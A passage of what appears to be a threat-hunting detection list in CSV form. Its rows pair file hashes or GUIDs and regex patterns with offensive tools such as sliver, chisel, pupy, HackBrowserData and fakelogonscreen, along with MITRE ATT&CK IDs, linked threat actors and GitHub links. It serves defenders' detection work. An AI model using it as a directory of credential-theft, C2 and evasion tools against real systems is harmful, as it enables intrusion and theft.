Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24515" "*350cfd6e53c72d9c3d2fa109cc73e69171d8f1bed85ced979483592908925aff*",".{0,1000}350cfd6e53c72d9c3d2fa109cc73e69171d8f1bed85ced979483592908925aff.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#filehash","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","24516" "*350ddee8077a8a8df47d7a57b8d25afaa7915b4a7b79bcd683684723d0f8b669*",".{0,1000}350ddee8077a8a8df47d7a57b8d25afaa7915b4a7b79bcd683684723d0f8b669.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24517" "*351268e508cccd1a0bf2c53e605a5db1df85b8c5d4095a4ef0e2d9bb997b39a2*",".{0,1000}351268e508cccd1a0bf2c53e605a5db1df85b8c5d4095a4ef0e2d9bb997b39a2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24518" "*35151960809a922f735b9492d55792b5cbcef5f3f47060ef484f92f63fe751a9*",".{0,1000}35151960809a922f735b9492d55792b5cbcef5f3f47060ef484f92f63fe751a9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24519" 
"*351b7ea09ad99959f21e0c21bef93112ec360ccef4bc0cbaaed390a16631326b*",".{0,1000}351b7ea09ad99959f21e0c21bef93112ec360ccef4bc0cbaaed390a16631326b.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","24521" "*352cbeb2cb8456e9462f30ce30e2110101446efda08aa6f36e150680908b638c*",".{0,1000}352cbeb2cb8456e9462f30ce30e2110101446efda08aa6f36e150680908b638c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24523" "*3532e7da204a5242b3ee2a3081cc68f7cd3728d45bbcbc582c077472bba4a7f5*",".{0,1000}3532e7da204a5242b3ee2a3081cc68f7cd3728d45bbcbc582c077472bba4a7f5.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24524" "*353f18e314f024ceea013bd97c140e09fd4ac715bf9ac7c965d0b89845dffcf0*",".{0,1000}353f18e314f024ceea013bd97c140e09fd4ac715bf9ac7c965d0b89845dffcf0.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","#filehash","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","24528" 
"*3544c0f867cd0e4fa8acf93997a3facb93662bf9b3770959b953aeb2f81adaa3*",".{0,1000}3544c0f867cd0e4fa8acf93997a3facb93662bf9b3770959b953aeb2f81adaa3.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24529" "*354a7236afe220e7c831129fbf32434edd1d18961118dfb05279ff5c1b6f38ad*",".{0,1000}354a7236afe220e7c831129fbf32434edd1d18961118dfb05279ff5c1b6f38ad.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","24530" "*354f17db4f3eeff8cbfd56f6aabea68deb7045572ba55298bbfb1e355c98a246*",".{0,1000}354f17db4f3eeff8cbfd56f6aabea68deb7045572ba55298bbfb1e355c98a246.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24531" "*354f944df24458e6113663bf2886bcd902304e0c2852b4447bb386361ca3ef86*",".{0,1000}354f944df24458e6113663bf2886bcd902304e0c2852b4447bb386361ca3ef86.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and 
perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24532" "*355a9a09cf1e95bf38e89df4c267121c3592c873de0ee9912afaf2cc840e77ca*",".{0,1000}355a9a09cf1e95bf38e89df4c267121c3592c873de0ee9912afaf2cc840e77ca.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24533" "*355c68b197356e23687866e8ea8068ac29b62e3bb4657b9180729eebce44d7a9*",".{0,1000}355c68b197356e23687866e8ea8068ac29b62e3bb4657b9180729eebce44d7a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24534" "*3560411a4c3ed8e9229e7684be1c002f39cdaa5482c6d5046984d4be7985a594*",".{0,1000}3560411a4c3ed8e9229e7684be1c002f39cdaa5482c6d5046984d4be7985a594.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","24535" "*35678541d1d3a394875f58f3add9b097f445dc15de0a720318da1db4d1de06e8*",".{0,1000}35678541d1d3a394875f58f3add9b097f445dc15de0a720318da1db4d1de06e8.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","24536" "*356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae*",".{0,1000}356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24537" "*356ce77ad527c67a64f6f770d67ef71a6d4ebecfd362d651cbf08c98e7f21555*",".{0,1000}356ce77ad527c67a64f6f770d67ef71a6d4ebecfd362d651cbf08c98e7f21555.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - 
T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24538" "*356d85b11449179fcb887ad4ce0356a23b8ef5a80318c4318c37d31f53affee8*",".{0,1000}356d85b11449179fcb887ad4ce0356a23b8ef5a80318c4318c37d31f53affee8.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24540" "*356fc0b7eacb629e745a774a22e5ed1f82aea70dc9bc420a1d71b9d28ef27830*",".{0,1000}356fc0b7eacb629e745a774a22e5ed1f82aea70dc9bc420a1d71b9d28ef27830.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24543" "*357b50be2506c10d74d5792d52cfd892155540741f3dbf270eefcffe6884fd14*",".{0,1000}357b50be2506c10d74d5792d52cfd892155540741f3dbf270eefcffe6884fd14.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24547" "*358282c9584c5b32ce5aa55238c71fc7d4cb405e5b7f0ef5e2db4950a4a34b4f*",".{0,1000}358282c9584c5b32ce5aa55238c71fc7d4cb405e5b7f0ef5e2db4950a4a34b4f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24548" "*35849ba82ab0c1fb2c295f53326954434d2612aa31dab3c1ea7703690477ab0d*",".{0,1000}35849ba82ab0c1fb2c295f53326954434d2612aa31dab3c1ea7703690477ab0d.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","24549" "*358f4605b34480a8bc335e7ba588171d12a7c14c7219b2438c3594392b7c0468*",".{0,1000}358f4605b34480a8bc335e7ba588171d12a7c14c7219b2438c3594392b7c0468.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","24550" "*35962679b2963d0c6af600db73685b744495e6a65a24c3c9809e8ab2ef52225a*",".{0,1000}35962679b2963d0c6af600db73685b744495e6a65a24c3c9809e8ab2ef52225a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - 
T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24551" "*35a1cbb81eb45e28f4e9cbecf0cc3d9d4bf1fe27413ae605bf6df9c226348768*",".{0,1000}35a1cbb81eb45e28f4e9cbecf0cc3d9d4bf1fe27413ae605bf6df9c226348768.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24553" "*35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7*",".{0,1000}35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24554" "*35a53f161401fc9f654cb82ed45244023ccd22315a638e8ec2b37b6ec814de80*",".{0,1000}35a53f161401fc9f654cb82ed45244023ccd22315a638e8ec2b37b6ec814de80.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","24555" "*35aa30b42ea12208cfad81a29831d88d0a778ab192186c516d89e1c9f538a285*",".{0,1000}35aa30b42ea12208cfad81a29831d88d0a778ab192186c516d89e1c9f538a285.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities 
like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24557" "*35c64b018248a12e677777eab956c086212a2fe5d7206e76d66ac5dc9fa41103*",".{0,1000}35c64b018248a12e677777eab956c086212a2fe5d7206e76d66ac5dc9fa41103.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24559" "*35c8d88f94fff53d9dd573801f16aa02e24f771668747e3f0d2975ff4d0b85b8*",".{0,1000}35c8d88f94fff53d9dd573801f16aa02e24f771668747e3f0d2975ff4d0b85b8.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","24560" "*35c8e39ebbd238ce994c3bb0cb274e37f2b5e94af2488e6009ecc872d465340b*",".{0,1000}35c8e39ebbd238ce994c3bb0cb274e37f2b5e94af2488e6009ecc872d465340b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24561" 
"*35cc4208d80e7a202cef1cf17f6a2d1a629400410eaccecdb70c3c85f79ec431*",".{0,1000}35cc4208d80e7a202cef1cf17f6a2d1a629400410eaccecdb70c3c85f79ec431.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24562" "*35d295a5f04094a88ddf9c0704c8555bcaf980d9eb15505549f2ace647324cd6*",".{0,1000}35d295a5f04094a88ddf9c0704c8555bcaf980d9eb15505549f2ace647324cd6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24563" "*35d2dc2cf8f535667b487b012b1d0efad5ceca399967923a580f1929f5717c52*",".{0,1000}35d2dc2cf8f535667b487b012b1d0efad5ceca399967923a580f1929f5717c52.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","24564" "*35d3030e079a68ce10e998b5140d66fbb54b4a6e7f8ed090bf918abc42175dce*",".{0,1000}35d3030e079a68ce10e998b5140d66fbb54b4a6e7f8ed090bf918abc42175dce.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#filehash","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","24565" "*35d9023ac28fe49540ae16d224a8edc09c97a12edfea883e48de778730cc2d3a*",".{0,1000}35d9023ac28fe49540ae16d224a8edc09c97a12edfea883e48de778730cc2d3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24567" "*3606d9525c865d6167a94ed60c9175e90f516104cbfe435aa30a34d05745badc*",".{0,1000}3606d9525c865d6167a94ed60c9175e90f516104cbfe435aa30a34d05745badc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24570" "*3608033d0516c29f2465dde62421670ed21b6da4ce9c9803fb09c0debc7bc8f8*",".{0,1000}3608033d0516c29f2465dde62421670ed21b6da4ce9c9803fb09c0debc7bc8f8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24571" "*360cf81e70e3f8cbdbb442c972896794f49c72515b1bc1699b2d25c8a37e4bfd*",".{0,1000}360cf81e70e3f8cbdbb442c972896794f49c72515b1bc1699b2d25c8a37e4bfd.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","24572" "*360F9CE5-D927-46B9-8416-4118D0B68360*",".{0,1000}360F9CE5\-D927\-46B9\-8416\-4118D0B68360.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#GUIDproject","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","24573" "*3615ddbae2c65e978aa8006c26b5c4a66c2e9433a1460b17ef700a39a708e5c1*",".{0,1000}3615ddbae2c65e978aa8006c26b5c4a66c2e9433a1460b17ef700a39a708e5c1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","24575" "*3615ddbae2c65e978aa8006c26b5c4a66c2e9433a1460b17ef700a39a708e5c1*",".{0,1000}3615ddbae2c65e978aa8006c26b5c4a66c2e9433a1460b17ef700a39a708e5c1.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","24576" "*361ec6983d4a8683b685dc4f9b7280e4faebf3a4006cc44c7aab3ea94fe9d2d4*",".{0,1000}361ec6983d4a8683b685dc4f9b7280e4faebf3a4006cc44c7aab3ea94fe9d2d4.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","24577" "*3622f69f847b1fd331363a847f626b9931363c81946b6d6e7441dc0959b4d971*",".{0,1000}3622f69f847b1fd331363a847f626b9931363c81946b6d6e7441dc0959b4d971.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","24578" 
"*3629589a44e2c3b8d1bbc7ae8c779b0a7522755906e09d4bd14b76d6e168741c*",".{0,1000}3629589a44e2c3b8d1bbc7ae8c779b0a7522755906e09d4bd14b76d6e168741c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24580" "*362a1076dc1f77532a07c12db0b3ce368eac2b15d1cfc8afa1a1a735ac25e430*",".{0,1000}362a1076dc1f77532a07c12db0b3ce368eac2b15d1cfc8afa1a1a735ac25e430.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24581" "*362c03182899bbfcbd5502658dc569c82347a3eedccb7576a5e061a7a536171a*",".{0,1000}362c03182899bbfcbd5502658dc569c82347a3eedccb7576a5e061a7a536171a.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","24582" 